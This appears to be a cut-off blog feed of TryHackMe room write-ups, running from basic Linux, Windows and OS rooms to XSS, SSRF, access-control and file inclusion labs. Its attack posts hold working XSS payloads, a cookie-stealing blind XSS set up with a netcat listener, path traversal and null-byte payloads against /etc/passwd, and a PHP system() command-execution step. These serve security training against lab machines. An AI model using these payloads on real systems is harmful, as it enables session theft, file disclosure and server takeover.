Assume Compromise: Even if your underlying tech stack (like an SSG) is inherently secure against server-side injection, the delivery network is always a potential attack vector.

Stay paranoid, rotate your keys, and don't trust the Edge implicitly. Anyway, Thanks for reading and see you in the next write-up.

Linux CLI Basics | TryHackMe Write-up

Sat, 28 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Linux CLI Basics. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

Summary: This task introduces the Linux Command-Line Interface (CLI) as an essential tool for navigating servers, using security tools, and setting up hacking environments. It establishes a storyline where you play a new IT Support Engineer tasked with learning basic terminal navigation to find your supervisor's notes.

Prerequisites

What does "CLI" stand for?

Command-Line Interface

Task 2: Navigation Mission: "Find the Missing Notes"

Summary: This section teaches the fundamental commands for navigating the Linux filesystem. You learn pwd to print your current directory, ls (along with -l and -al flags) to list files including hidden ones, and cd to change directories. It also introduces the find command to locate specific files across the system and the cat command to read their contents, culminating in finding a file named mission_brief.txt.

What is the full path of the mission_brief.txt file found on the system using the find command?

Just run and wait for the complete path to appear.

/home/ubuntu/Documents/.research/archive/mission_brief.txt

What is the flag hidden inside the mission_brief.txt file?

then run the script to the full path with the cat command

MISSION-FOUND

Task 3: Investigating the System

Summary: Here, the focus shifts to gathering system information to understand the environment you are operating in. You are introduced to whoami to check your current user, uname -a to get kernel and architecture details, and df -h to check disk space in a human-readable format. Additionally, you learn to explore the /etc directory to read configuration files like os-release. The task ends with a mini-challenge to find and read a file called day1_report.txt.

What is the username returned by the whoami command?

ubuntu

What is the kernel version shown by uname -a?

6.14.0-1018-aws

How much free disk space does df -h report?

58G

What is the message written inside day1_report.txt?

We can run this script first to find the file path: find ~ -name day1_report.txt

Once found, it's at this path: /home/ubuntu/.logs/archive/day1_report.txt

Just run it with the cat command: cat /home/ubuntu/.logs/archive/day1_report.txt

END-OF-DAY1

Task 4: Conclusion

Summary: This final task summarizes the skills acquired during your "first day" on the job. It recaps that you have successfully learned to navigate the filesystem, search for files, inspect system info, and read configs. These basics serve as the foundation for learning more advanced Linux topics like file permissions, processes, and security tooling.

Continue to complete the room.

No answer needed

Thanks for reading. See you in the next lab.

Windows Basics | TryHackMe Write-up

Fri, 27 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Windows Basics. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This task introduces the Microsoft Windows operating system, setting the scenario as your first day working at "TryHatMe." It outlines the learning objectives, such as navigating the graphical interface, using File Explorer, adjusting system settings, and utilizing basic tools like Task Manager. Prerequisites for this room include a foundational understanding of computer components and what an operating system is.

Prerequisites

I understand the learning objectives and am ready to learn about Windows!

No answer needed

Task 2: Exploring the Windows Workspace

This section covers the evolution of Windows from early command-line interfaces to the modern GUI. It explains user authentication levels (Guest, Standard, Administrator) and breaks down the core elements of the Windows desktop, including the Taskbar, Start Menu, and built-in apps like File Explorer and Notepad. Finally, it guides you on how to check your machine's hardware and OS specifications using the "About your PC" settings and how to navigate the system's hierarchical folder structure.

Please ensure the virtual machine is open in split-screen, then take a look at the computer's Desktop. After opening About your PC, navigate to the Device specifications section. What is the Device name specified?

just follow the instruction

TryHatMe

Continue looking through the Device specifications. How much RAM is installed on your new work PC?

4.00 GB

Scroll down to the Windows specifications section. Which Version of Windows Server 2019 Datacenter is installed?

1809

Explore the TryHatMe Onboarding folder located on your computer's Desktop. What is the flag value found within Welcome.txt?

THM{welcome_to_tryhatme!}

Task 3: Configuring and Securing Windows

This task focuses on application management, system configuration, and built-in security. It explains how to update, install (.exe/.msi files), and uninstall applications. You are introduced to the modern Windows Settings app and the legacy Control Panel for system configurations. Additionally, it covers how to monitor real-time system performance using Task Manager, run custom malware scans via Windows Security, and understand network traffic rules using the Windows Defender Firewall.

Use the TryHatMeWelcome installer located within the TryHatMe Onboarding folder. What is the flag value you receive after installing and running the application?

Hello New Employee,

Welcome to the TryHatMe team!

Within this folder, you will find everything you need to get started with your onboarding tasks.
These files will be used throughout the room to help you practice navigating Windows, managing files and folders, and exploring built-in tools.

Take some time to review the contents, follow the instructions carefully, and don’t hesitate to explore. This environment is safe to experiment in.

Good luck, and welcome aboard!

flag: THM{welcome_to_tryhatme!}

THM{welcome_to_tryhatme!}

Investigate the Time & Language section of the Windows Settings app. Which country or region is your computer currently set to?

Use the region settings and see if United States is the answer.

United States

Open the Task Manager on your workstation's Desktop and navigate to the Users tab. Which account is currently logged in?

You can right click and then click Task Manager.

Administrator

After performing your custom scan, click Virus:DOS/EICAR_Test_File and select See details. What is the file name shown in the Affected items section?

Simply click Windows, then search for virus and threat protection. Then click quick scan. After that, view the results.

tryhatmemaldoc.txt

Task 4: Conclusion

The final task wraps up the "Windows Basics" room, summarizing the hands-on experience you gained while navigating Windows Server 2019. It provides a helpful glossary of key terminology covered in the room (such as Desktop, Start Menu, File Explorer, and Task Manager) and recommends further learning paths, specifically pointing toward command-line interface (CLI) basics for both Linux and Windows.

Complete the room and continue on your cyber learning journey!

No answer needed

Thanks for reading. See you in the next lab.

Operating Systems: Introduction | TryHackMe Write-up

Thu, 26 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Operating Systems: Introduction. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This section introduces the concept of an Operating System (OS) as the invisible foundational layer that connects a computer's physical hardware with its applications. Through a scenario involving a gifted old computer, the task outlines the learning objectives: understanding the core duties of an OS, identifying common OS types, and practicing basic OS interaction to gather system specifications.

Prerequisites

I understand the learning objectives and am ready to learn about operating systems!

No answer needed

Task 2: The Invisible Manager

An Operating System acts as the central manager of a computer, functioning much like air traffic control at an airport to prevent conflicts and ensure smooth operations. It separates system privileges into two layers: the highly-privileged Kernel space (direct hardware access) and the restricted User space (where standard apps run and must request permissions). The core duties of an OS include managing processes, memory, file systems, users, and devices, while also providing foundational security features like authentication, permissions, and isolation.

Which OS space has unrestricted access to your computer's hardware?

Kernel space

Which OS responsibility manages user accounts, authentication, and permissions?

User Management

After opening the About This Computer shortcut, you are greeted with an overview of the system's specifications. What version of Ubuntu Mate is your computer running?

From here we know whether the version of Ubuntu used is MATE 1.26.2.

1.26.2

Check out the Hardware section of the System tab. How much memory is allocated to your machine?

1.9 GiB

Task 3: OS Interaction and Landscape

Users typically interact with an OS through two main interfaces: a Graphical User Interface (GUI), which uses visual elements like icons and windows, or a Command-Line Interface (CLI), which relies on precise text-based commands for control. Operating systems vary widely based on their environment and are categorized into Desktop (Windows, macOS, Linux), Server (Linux, Windows Server), Mobile (Android, iOS), Embedded/IoT (Embedded Linux, RTOS), and Virtual/Cloud environments. This diverse landscape exists because different devices require unique balances of user-friendliness, stability, efficiency, and resource management.

Open the File Systems tab in System Monitor. What Type is listed for the /dev/root device?

standard Ubuntu VM environment

ext4

After opening the Home directory on the Desktop, how many user directories exist?

3

Navigate to Alex's home directory and explore the Documents folder. What is the flag value contained in note.txt?

THM{new_pc_for_free!}

Task 4: Conclusion

This concluding section wraps up the module by reviewing the core concepts of what an operating system manages behind the scenes. It provides a quick recap of essential terminology, including the definitions of an OS, Kernel space, User space, GUI, and CLI. Finally, it offers suggestions for further learning paths, encouraging students to dive deeper into Windows and Linux CLI basics.

Complete the room and continue on your cyber learning journey!

No answer needed

Thanks for reading. See you in the next lab.

Computer Types | TryHackMe Write-up

Sat, 21 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Computer Types. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

Sophia discovers that computers are not limited to traditional laptops and phones; they are also hidden inside everyday objects like smart refrigerators. The goal of this section is to help you identify and differentiate between direct-use computers (laptops, smartphones) and indirect ones (servers, IoT devices, embedded systems) based on their purposes.

Ready to find the hidden computers?

No answer needed

Task 2: Sophia’s Summer of Hidden Computers – Month 1

Sophia learns that computers are built differently depending on their intended use. Laptops offer portability but struggle with sustained performance due to cooling limitations. Desktops provide steady, sustained performance at a fixed location. Workstations are specialized for precision and reliability in professional tasks. Finally, Servers operate entirely without screens or keyboards, running continuously to provide services to multiple users over a network.

Which computer type usually runs without a dedicated screen and keyboard?

Server

What kind of computer with specialized components would one buy to carry out precision work?

Workstation

Task 3: Sophia’s Summer of Hidden Computers – Month 2

Millions of computers hide in plain sight inside everyday objects. Smartphones are the most popular pocket-sized computers, while tablets offer a touch-first experience. The main difference between IoT and Embedded systems is connectivity: IoT devices (like smart doorbells) connect to a network for single-purpose tasks, whereas embedded computers (found inside coffee machines or automatic doors) operate silently inside a machine and often never connect to the internet.

What is the currently most popular pocket-sized computer?

Smartphone

What kind of computer would you expect to find in a coffee machine?

Embedded computer

Task 4: Why Computers Come in Different Flavors

Computers come in different types because every design involves trade-offs. Making a device mobile means sacrificing sustained power, while making a system highly reliable increases the cost due to redundancy (extra power supplies and disks). There is no single "best" computer; the design is entirely shaped by its specific purpose.

Go through the attached static site and get the flag.

Workstation: edit 4K video all day.
Server: Host a website 24/7.
Embedded: Ring when button pressed.

Why do laptops throttle more than desktops?

Less cooling space

What does server redundancy prevent?

Single point of failure

Why do smartphones last longer on battery than laptops?

Optimized for efficiency

Which feature is more common in workstations?

ECC RAM and certified drivers

In many smart homes, what coordinates devices?

Hub or cloud service

THM{8_computer_types}

Task 5: Summary

Sophia concludes her internship by realizing that computers are everywhere, often running silently in the background to keep daily life functioning (like opening doors or flying planes). The module covered eight distinct types of computers and the specific trade-offs involved in choosing the right tool for a given job.

Room complete!

No answer needed

Thanks for reading. See you in the next lab.

Inside a Computer System | TryHackMe Write-up

Fri, 20 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Inside a Computer System. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

Summary: This task introduces the importance of learning computer fundamentals before jumping into cybersecurity. Using the analogy of defending a castle, it emphasizes that you cannot protect a system if you don't understand how it works, what its building blocks are, and how they interact. The main objective is to recognize and understand the functions of various computing components.

Let's get started!

No answer needed

Task 2: Inside a Computer System

Summary: This section explains that nearly every computer system consists of the same fundamental building blocks, each with a specific job. To make it easier to understand, the lesson uses an analogy comparing PC components to parts of the human body. An interactive static site is provided to explore these components and retrieve a flag.

Give in the flag you received after completing the exercise on the static site.

The motherboard is like the skeleton and nervous system, connecting everything together.

The CPU is the brain of the computer, constantly executing instructions.

RAM is like short-term memory - fast but temporary.

Storage devices are for long-term data retention.

Network adapters let your computer talk to other systems.

The PSU is like the heart, pumping power to everything.

The graphics card processes visuals for your monitor.

I/O devices are how we interact with computers.

THM{4llpccomp0n3nts1d3nt1f13d}

Task 3: What Happens When You Press the Start Button?

Summary: This task details the 5-step boot sequence a computer goes through before loading the Operating System, continuing the human body analogy:

Press the Power Button: Sends a signal to the Power Supply Unit (PSU) to allow power to flow.
Firmware Starts: The Unified Extensible Firmware Interface (UEFI), which has largely replaced BIOS, starts up the components.
Power-On Self Test (POST): The UEFI tests if all required components are present and functioning correctly.
Select Boot Device: The UEFI checks its prioritized list to find the device containing the OS bootup routine.
Initiate Bootloader: The bootloader transfers the Operating System from the boot device into the RAM and hands over control to the OS.

What is the flag that you received after completing the exercise?

THM{pc5ucce55fully5t4rt3d}

Task 4: Conclusion

Summary: The final task wraps up the module by reminding you that understanding core components and the boot process is crucial for future cybersecurity concepts, as hackers frequently target these areas. It also sets the stage for the next room, which will cover how different combinations of these components create diverse types of computer systems.

I am ready to discover the different types of computer systems and their function!

No answer needed

Thanks for reading. See you in the next lab.

Offensive Security Intro | TryHackMe Write-up

Fri, 20 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Offensive Security Intro. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Think like a Hacker

Offensive Security involves thinking like an attacker to identify and fix vulnerabilities before malicious hackers can exploit them. In this exercise, you will practice hacking a simulated website to understand the methods used by ethical hackers.

Which term describes simulating a hacker's actions to find weaknesses?

Offensive Security

Task 2: Starting the Lab

This task introduces the virtual desktop environment used for the simulation. You will be targeting a simulated banking application called FakeBank, which automatically opens in the lab's browser.

What is the bank account number in the FakeBank application?

8881

Task 3: Find Hidden Pages

A common web vulnerability is leaving hidden administrative pages accessible. You will use a terminal-based hacking tool called dirb to find these pages. By running the command dirb http://fakebank.thm, the tool will scan the website and reveal hidden directories marked with a +.

Dirb found one URL, http://fakebank.thm/images. What is the other hidden URL?

http://fakebank.thm/bank-transfer

Task 4: Attack the Admin Page

Using the hidden URL discovered in the previous task, you can access an admin panel that allows you to transfer funds. By navigating to the /bank-transfer page, you can input your account number (8881) and deposit $2000 to successfully manipulate your account balance.

When your balance turns positive, a pop-up with green text appears. Enter the green words as the answer (ALL CAPS)

BANK HACKED

Thanks for reading. See you in the next lab.

Intro to Cross-site Scripting | TryHackMe Write-up

Wed, 18 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Intro to Cross-site Scripting. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Room Brief

This room introduces Cross-Site Scripting (XSS), a common injection attack where malicious JavaScript is injected into a web application to be executed by other users. You will learn about different XSS types, how to create and modify payloads to bypass filters, and apply these skills in a practical lab.

What does XSS stand for?

Cross-Site Scripting

Task 2: XSS Payloads

A payload in XSS is the JavaScript code intended to execute on the target's computer. It consists of the "intention" (what you want the script to do, like stealing sessions or logging keystrokes) and the "modification" (how you adapt the code to run in a specific scenario). Common intentions include Proof of Concept (PoC) alerts, session stealing, keyloggers, and exploiting business logic.

Which document property could contain the user's session token?

document.cookie

Which JavaScript method is often used as a Proof Of Concept?

alert

Task 3: Reflected XSS

Reflected XSS occurs when unvalidated user input is immediately included in the webpage source via an HTTP request. Attackers can craft malicious links and send them to victims. When the link is clicked, the script runs in the victim's browser. Testing points typically include URL query parameters, URL file paths, and sometimes HTTP headers.

Where in an URL is a good place to test for reflected XSS?

parameters

Task 4: Stored XSS

Stored XSS happens when a malicious payload is saved directly onto the web application (e.g., in a database) and executes when other users visit the affected page. Common entry points include blog comments, user profiles, and website listings. This is highly dangerous as it requires no direct social engineering once the payload is planted.

How are stored XSS payloads usually stored on a website?

database

Task 5: DOM Based XSS

DOM (Document Object Model) Based XSS executes JavaScript directly in the browser without loading new pages or sending data to the backend. It occurs when a website's JavaScript acts unsafely on user input (like window.location.hash) and writes it into the webpage's DOM or passes it to unsafe functions like eval().

What unsafe JavaScript method is good to look for in source code?

eval()

Task 6: Blind XSS

Blind XSS is a variant of stored XSS where the payload is saved on the server, but the attacker cannot see it execute. A common example is injecting code into a contact form that is later viewed by a staff member on a private support portal. Attackers typically use payloads with callbacks (HTTP requests) and tools like XSS Hunter Express to capture execution details.

What tool can you use to test for Blind XSS?

XSS Hunter Express

What type of XSS is very similar to Blind XSS?

Stored XSS

Task 7: Perfecting your payload

This task covers adapting your payload to match how it is reflected in the target's HTML source code. Techniques include escaping HTML attributes (e.g., ">), closing existing tags (e.g., </textarea>), breaking out of JavaScript variables (e.g., ';), bypassing simple word filters by nesting strings (e.g., <sscriptcript>), and utilizing HTML event attributes like onload. It also introduces XSS Polyglots, which are complex strings designed to bypass multiple contexts and filters at once.

What is the flag you received from level six?

Okay, the method here is quite simple; just follow the instructions from level one to level 6 until you eventually get the flag once completed.

Level 1: <script>alert('THM');</script>
Level 2: "><script>alert('THM');</script>
Level 3: </textarea><script>alert('THM');</script>
Level 4: ';alert('THM');//
Level 5: <sscriptcript>alert('THM');</sscriptcript>
Level 6: /images/cat.jpg" onload="alert('THM');

THM{XSS_MASTER}

Task 8: Practical Example (Blind XSS)

In this practical scenario, you exploit a Blind XSS vulnerability within a support ticketing system. By escaping a <textarea> tag, you inject a JavaScript payload designed to steal a staff member's session cookie. The payload uses document.cookie, encodes it in base64 using btoa(), and exfiltrates it via an HTTP fetch() request to an attacker-controlled Netcat listener.

What is the value of the staff-session cookie?

In this instance, on the Acme IT Support page via the provided link, we simply go to the customers tab and sign up for a new account; for example, I used a "test" account.

Then, we run a listener on port 9001 on the attack box: nc -nlvp 9001

After that, we create a ticket with a payload to redirect the cookie to the attacker's IP.

Then, simply click it and check the listener output.

Once we receive the encoded string, we attempt to decode it from Base64. We can use CyberChef with the "From Base64" tool as shown below.

And we obtain the staff-session:

4AB305E55955197693F01D6F8FD2D321

Thanks for reading. See you in the next lab.

Intro to SSRF | TryHackMe Write-up

Mon, 16 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Intro to SSRF. Written in 2026, I hope this write-up helps others learn and practice cybersecurity. Here is the extracted and summarized content formatted in English according to your rules:

Task 1: What is an SSRF?

Server-Side Request Forgery (SSRF) is a vulnerability that allows a malicious user to manipulate a web server into making an additional or edited HTTP request to a resource of their choosing. There are two main types: Regular SSRF (where data is returned to the attacker's screen) and Blind SSRF (where the request occurs, but no information is returned). A successful SSRF attack can lead to unauthorized access to restricted areas, exposure of sensitive customer or organizational data, the ability to pivot into internal networks, and the revelation of authentication tokens or credentials.

What does SSRF stand for?

Server-Side Request Forgery

As opposed to a regular SSRF, what is the other type?

Blind

Task 2: SSRF Examples

This task involves interacting with an external site to view common SSRF examples and learn how to exploit them. It includes a simulation exercise where you can test your newfound knowledge to uncover a hidden flag.

What is the flag from the SSRF Examples site?

kita bisa lihat bahwa url awal yang di berikan adalah https://website.thm/item/2?server=api

parameter penting: server=api

Kemungkinan besar backend membuat request seperti ini: https://api.website.thm/item/2

Karena server langsung dimasukkan ke URL, kita bisa mengontrol request yang dilakukan server.

kita harus membuat backend request ke: https://server.website.thm/flag?id=9

maka kita menggunakan payload: server=server.website.thm/flag?id=9&z=

menjadi https://website.thm/item/2?server=server.website.thm/flag?id=9&z=

di mana &z= digunakan untuk:

Menghindari error parsing URL
Menangkap tambahan path /item/2
Membuat query tetap valid

THM{SSRF_MASTER}

Task 3: Finding an SSRF

SSRF vulnerabilities can be spotted in web applications in several common places: full URLs used in address bar parameters, hidden fields in forms, partial URLs (like hostnames), or specific URL paths. Discovering a working payload often requires trial and error. When dealing with Blind SSRFs, since no output is reflected, you must use external HTTP logging tools (like RequestBin, your own HTTP server, or Burp Suite's Collaborator) to monitor and catch the out-of-band requests.

Based on simple observation, which of the following URLs is more likely to be vulnerable to SSRF? **1. https://website.thm/index.php** **2. https://website.thm/list-products.php?categoryId=5325** **3. https://website.thm/fetch-file.php?fname=242533.pdf&srv=filestorage.cloud.thm&port=8001** **4. https://website.thm/buy-item.php?itemId=213&price=100&q=2**

3

Task 4: Defeating Common SSRF Defenses

Developers often implement defenses against SSRF, primarily using Deny Lists or Allow Lists.

Deny Lists block specific sensitive locations (like localhost or 127.0.0.1). Attackers can bypass these using alternative IP representations (e.g., 0.0.0.0, 127.1) or custom DNS records. In cloud environments, the IP 169.254.169.254 is often targeted for sensitive metadata.
Allow Lists strictly permit only approved inputs (e.g., URLs starting with a specific domain). Attackers can bypass this by creating a subdomain on their own server that matches the allowed string.
Open Redirects can be used as a last resort if other bypasses fail. An attacker can use a legitimate open redirect endpoint on the target server to forward the internal HTTP request to a domain of their choosing.

What method can be used to bypass strict rules?

Open Redirect

What IP address may contain sensitive data in a cloud environment?

169.254.169.254

What type of list is used to permit only certain input?

Allow List

What type of list is used to stop certain input?

Deny List

Task 5: SSRF Practical

This practical scenario targets the Acme IT Support website. During content discovery, a restricted /private endpoint and a new /customers/new-account-page with an avatar selection feature are found. By inspecting the avatar form, you can see it uses a file path to load the image. Directly changing the form value to private is blocked by a deny list. However, you can bypass this defense using a directory traversal trick (x/../private). Once successfully bypassed, the web application updates the avatar with the base64 encoded contents of the restricted /private directory, which can be decoded to reveal the final flag.

What is the flag from the /private directory?

pertama kita coba bikin akun dulu

lalu arahkan ke link untuk membuat avatar

https://IP_MACHINE.reverse-proxy.cell-prod-ap-south-1b.vm.tryhackme.com/customers/new-account-page

lalu di halaman update avatar kita gunakan inspect unutk merubah value misal menjadi "x/../private"

setelah berhasil maka kita lakukan juga inspect di bagian current avatar

di sini kita meneukan kode base64

bisa gunakan cyberchef: https://gchq.github.io/CyberChef/ dan gunakan base64 dan kita mendapat flagnya

THM{YOU_WORKED_OUT_THE_SSRF}

Thanks for reading. See you in the next lab.

OWASP Top 10 2025: IAAA Failures | TryHackMe Write-up

Mon, 16 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on OWASP Top 10 2025: IAAA Failures. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

In this room, we are introduced to three specific categories from the OWASP Top 10 2025 that deal with failures in the IAAA framework (Identity, Authentication, Authorisation, and Accountability). Designed for beginners, this room covers practical exercises focusing on A01: Broken Access Control, A07: Authentication Failures, and A09: Logging & Alerting Failures.

I am ready to learn about IAAA failures!

No answer needed

Task 2: What is IAAA?

IAAA is a sequential framework used to verify users and their actions within an application. You cannot skip any step in this flow. It consists of Identity (who the user claims to be), Authentication (proving that identity), Authorisation (determining what they are allowed to do), and Accountability (logging their actions for tracking). Weaknesses in any of these areas can lead to severe security breaches.

What does IAAA stand for?

Identity, Authentication, Authorisation, Accountability

Task 3: A01: Broken Access Control

Broken Access Control happens when an application fails to properly verify server-side permissions on user requests. A prime example is IDOR (Insecure Direct Object Reference), where an attacker can simply change an ID parameter in a URL (like ?id=1 to ?id=2) to view another user's data (horizontal privilege escalation) or access admin-level functions (vertical privilege escalation).

If you don't get access to more roles but can view the data of another users, what type of privilege escalation is this?

Horizontal

What is the note you found when viewing the user's account who had more than $ 1 million?

You can just keep trying different IDs until you find the one containing the flag, which is https://bank.thm/accounts?id=7

THM{Found.the.Millionare!}

Task 4: A07: Authentication Failures

Authentication failures occur when an application's login or registration mechanics are flawed, allowing attackers to hijack identities. Common vulnerabilities include username enumeration, weak password policies without rate limiting, and broken logic flows. For example, poor implementation might allow an attacker to bypass security simply by registering an account with a case variation, like "aDmiN" instead of "admin".

What is the flag on the admin user's dashboard?

Simply register with a different account name variation, for example, aDmin

and we will gain access to the admin account.

THM{Account.confusion.FTW!}

Task 5: A09: Logging & Alerting Failures

Without proper logging and alerting, an application lacks accountability, leaving security teams completely blind to active attacks. Failures in this category include missing authentication logs, vague error messages, or failing to monitor for brute-force attempts and suspicious privilege escalations. Good logging requires centralized, untamperable records of all critical lifecycle events.

It looks like an attacker tried to perform a brute-force attack, what is the IP of the attacker?

Here we can see the various login attempts.

203.0.113.45

Looks like they were able to gain access to an account! What is the username associated with that account?

admin

What action did the attacker try to do with the account? List the endpoint the accessed.

This is the path that the attacker appears to be trying to breach.

/supersecretadminstuff

Task 6: Conclusion

Wrapping up, we've learned how critical the IAAA framework is to application security. To prevent these OWASP Top 10 vulnerabilities, developers must enforce strict server-side access checks on every request, secure authentication flows against brute-forcing and account confusion, and ensure robust, off-host logging to detect and investigate anomalies.

I understand the importance of a secure IAAA implementation in my application!

No answer needed

Thanks for reading. See you in the next lab.

File Inclusion | TryHackMe Write-up

Fri, 13 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on File Inclusion. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.]

Task 1: Introduction

This section introduces File Inclusion vulnerabilities, specifically Local File Inclusion (LFI), Remote File Inclusion (RFI), and Directory Traversal. These vulnerabilities typically occur in web applications (often written in PHP) due to poor input validation, allowing users to manipulate URL parameters. If exploited, attackers can leak sensitive data or achieve Remote Command Execution (RCE).

Let's continue to the next section to deploy the attached VM.

No answer needed

Task 2: Deploy the VM

Instructions are provided to deploy the target virtual machine. You need to connect to the TryHackMe network via OpenVPN or use the in-browser AttackBox to access the machine's IP address and view the vulnerable web application.

Once you've deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!

No answer needed

Task 3: Path Traversal

Path Traversal (or Directory Traversal) allows an attacker to access files or directories outside the web application's root folder. By manipulating URL parameters with "dot-dot-slash" (../) payloads, attackers can navigate up the directory tree to read sensitive OS files like /etc/passwd on Linux or c:\boot.ini on Windows. This usually happens when user input is passed unsanitized into functions like file_get_contents in PHP.

What function causes path traversal vulnerabilities in PHP?

file_get_contents

Task 4: Local File Inclusion - LFI

LFI occurs when a web application includes local files using unsanitized user input, commonly through PHP functions like include, require, include_once, and require_once. Even if a developer specifies a directory prefix in the code (e.g., include("languages/" . $_GET['lang']);), an attacker can still bypass it by using path traversal payloads (like ../../../../etc/passwd) to break out of the intended folder and read system files.

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

First, let's open the website.

Then, click on Lab #1 first. In the question, we are given this hint:

example: /index.php?lang=EN.php

So we try to input /etc/passwd and then extract it from the URL. The URL appears like this: http://IP_MACHINE/lab1.php?file=etc%2Fpasswd

/index.php?lang=/etc/passwd

In Lab #2, what is the directory specified in the include function?

In this second lab, we try to perform a random input, for example "test", and the path that appears is "includes".

Task 5: Local File Inclusion - LFI Continued

This task covers advanced techniques to bypass LFI filters when performing black-box testing:

Null Byte Injection (%00): Tricks the application into ignoring appended file extensions (like .php). Note: This only works on PHP versions below 5.3.4.
Current Directory Trick (/.): Used to bypass keyword filters. Adding /. at the end resolves to the exact same file path without triggering simple string filters.
Double Traversal (....//): Bypasses basic replacement filters that strip ../ strings. When the application removes the first ../, the remaining characters form a valid ../ payload.
Forced Prefix Bypassing: If the app forces the input to start with a specific directory name, you simply include it at the start of your payload (e.g., languages/../../../../../etc/passwd).

Give Lab #3 a try to read /etc/passwd. What is the request look like?

Okay, here's a tip: Don't trust the input form. Insert directly into the browser's address bar!

We want to read the sensitive file: /etc/passwd

So we use directory traversal to break out of the "languages" folder: ../../../../etc/passwd

The problem is that the application appends .php at the end, so it attempts to read: /etc/passwd.php, which does not exist.

The solution is to use a Null Byte (%00) so that the .php extension is ignored: ../../../../etc/passwd%00

/index.php?lang=../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

When trying a test input, a warning appears showing the function:

file_get_contents

Try out Lab #6 and check what is the directory that has to be in the input field?

When trying to enter the text "test", the only allowed folder is "THM-profile".

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

Since we are in Lab #6, where we must use the "THM-profile" path at the beginning, we use: THM-profile/../../../../etc/os-release

Task 6: Remote File Inclusion - RFI

RFI allows an attacker to include and execute a remotely hosted file into the vulnerable application. It usually requires the allow_url_fopen setting to be enabled in PHP. Because attackers can host malicious PHP code (like a reverse shell) on their own server and inject its URL into the vulnerable parameter, RFI poses a much higher risk than LFI, reliably leading to Remote Command Execution (RCE), Cross-Site Scripting (XSS), or Denial of Service (DoS).

We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.

No answer needed

Task 7: Remediation

To prevent file inclusion vulnerabilities, developers should practice defense-in-depth:

Keep systems, frameworks, and services updated.
Disable PHP errors to prevent path disclosure.
Implement a Web Application Firewall (WAF).
Turn off allow_url_fopen and allow_url_include if not needed.
Strictly validate and sanitize all user input.
Use strong whitelisting for file names and locations instead of relying on blacklisting.

Ready for the challenges?

No answer needed

Task 8: Challenge

This final section is a practical assessment where you apply all the LFI and RFI techniques learned. Testing steps include finding the entry point (via GET, POST, headers, or cookies), fuzzing the input parameters, analyzing error messages for directory paths, understanding filters, and successfully injecting payloads to extract flags or gain RCE.

Capture Flag1 at /etc/flag1

Here we try to test using the input "test".

Then right-click and select "Edit and Resend" to perform a POST request.

POST to http://IP_MACHINE/challenges/chall1.php

with the payload file=/etc/flag1

And don't forget to set the Content-Type: application/x-www-form-urlencoded.

Reference for this: https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Content-Type

Click on the response section, and we get the first flag.

F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

Go ahead and open Lab #Challenge-2 and refresh the page until the message "Welcome Guest!. Only admins can access this page!" appears.

From there, we can directly try changing the cookies via Inspect, then select the Storage tab and choose Cookies.

If we try to change it to "admin", we don't find much, just a message:

"File Content Preview of admin Welcome admin This is a admin web page! Get the flag!"

Then we try using the keyword "test", and we can find an insight into the path that appears:

Warning: include(includes/test.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

So we just use ../../../../etc/flag2%00, where %00 is used to bypass the PHP extension (only works for PHP versions below 5.3.4), to retrieve the flag.

c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

On the Challenge 3 page, when testing with "test", two warning responses appear:

Warning: include(test.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall3.php on line 30

Warning: include() [function.include]: Failed opening 'test.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall3.php on line 30

Then, when trying etc/passwd:

It turns out to be filtered; however, after reading the hint, it seems not everything is filtered.

The hint states: [Hint #1] Not everything is filtered! [Hint #2] The website uses $_REQUESTS to accept HTTP requests. Do research to understand it and what it accepts!

So we try using POST and don't forget to add Content-Type: application/x-www-form-urlencoded.

And when testing file=etc/passwd, it was successful.

So we use the body file=../../../../etc/flag3%00 to retrieve the flag.

P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Let's head over to IP_MACHINE/playground.php.

We open: IP_MACHINE/playground.php

On the page, there is a "File Name" input and the message:

Current Path /var/www/html

When we try a payload such as:

../../../../etc/passwd

the server displays the file content. This indicates the presence of Local File Inclusion (LFI), as the backend likely executes:

include($_GET['file']);

This means the value of the "file" parameter is directly included by PHP without any sanitization.

After that, we create a file, for example payload.php, with the following content:

system($_GET['cmd'])

Then simply run it to retrieve the flag:

data://text/plain,<php code>

lfi-vm-thm-f8c5b1a78692

Thanks for reading. See you in the next lab.

RustScan Has Trade-Offs And Works Best With Nmap

Fri, 06 Mar 2026 00:00:00 GMT

RustScan is often praised for its incredible speed, but it's important to understand that this speed comes with certain compromises. While it's a powerful tool in a pentester's arsenal, it's designed to complement—not replace—industry standards like Nmap.

1. Speed (The Core Strength of RustScan)

RustScan is built with Rust and utilizes massive parallel scanning.

This means:

